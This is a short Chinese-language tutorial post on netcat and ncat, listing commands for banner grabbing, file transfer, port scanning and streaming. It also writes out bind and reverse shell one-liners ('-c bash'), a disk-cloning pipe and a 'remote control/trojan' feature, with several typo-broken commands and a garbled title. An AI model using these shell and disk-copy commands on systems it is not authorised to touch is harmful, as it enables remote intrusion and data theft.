一個假豬套神器:NET CAT-NC
阿新 • • 發佈:2017-11-05
ron 驗證 banner cache net ner 取證 tcp協議 系統
引:NAT CAT有”瑞士軍刀“的美稱,支持跨平臺的使用。
- 小身材,大智慧
- 偵聽模式/傳輸模式
- telnet/獲取banner信息
- 傳輸文本信息
- 傳輸文件/目錄
- 加密傳輸文件
- 遠程控制/木馬
- 加密所有流量
- 流媒體服務器
- 遠程克隆硬盤
NC TELNET /BANNER :
- nc -nv 1.1.1.1 80
- nc -nv 1.1.1.1 25
- nc -nv 1.1.1.1 110
NC 傳輸文件/目錄:
傳輸文件
- A:nc -lp 333>1.mp4
- B:nc -nv IP 端口<1.mp4 -q 1(傳遞連接完畢後1秒斷開)
- 或
- A:nc -q l -lp 333 <a.mp4
- B:nc -nv 1.1.1.1 333>2.mp4
傳輸目錄
- A:tar -cvf -music/ | nc -lp 333 -q 1
- B:nc -nv IP 端口 | tar -xvf -
加密傳文件
- A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256-m ecb >1.mp4
- B: mcrypt --flush -Fbq -a rijindael-256 -m ecb <a.mp4 | nc -nv IP 端口 -q 1
NC-流媒體服務
- A:cat 1.mp4 | nc -lp 333
- B: IP 端口 | mplayer -vo x11 -cache 3000 -
NC 端口掃描
- nc -nvz ip 端口範圍(TCP協議)
- nc -nvzu ip 端口範圍(UDP協議)
NC 遠程克隆硬盤
- A: nc lp 333 | dd of= /dev/sda
- B: dd if=/dev/sda | nc -nv IP 端口 -q 1
- 遠程電子取證,可以將目標服務器硬盤遠程復制,或者內存。
NC 遠程控制
PS:建立連接後可以實現雙向的控制(服務器端與控制端)。
正向連接:
- A:nc -lp 333 -c bash
- B:nc ip 端口
反向連接:
- A: nc -lp 333
- B:nc ip 端口 -c(連接建立後生成一個shell) bash
NC:NCAT
- NC缺乏加密與驗證能力
- NCat包含於Nmap工具中
- A: ncat ncat -c bash -allow IP -vnl 端口 --ssl
- B:ncat -nv IP 端口 -ssl
- 不同系統/平臺的NC參數功能不一定全部相同
一個假豬套神器:NET CAT-NC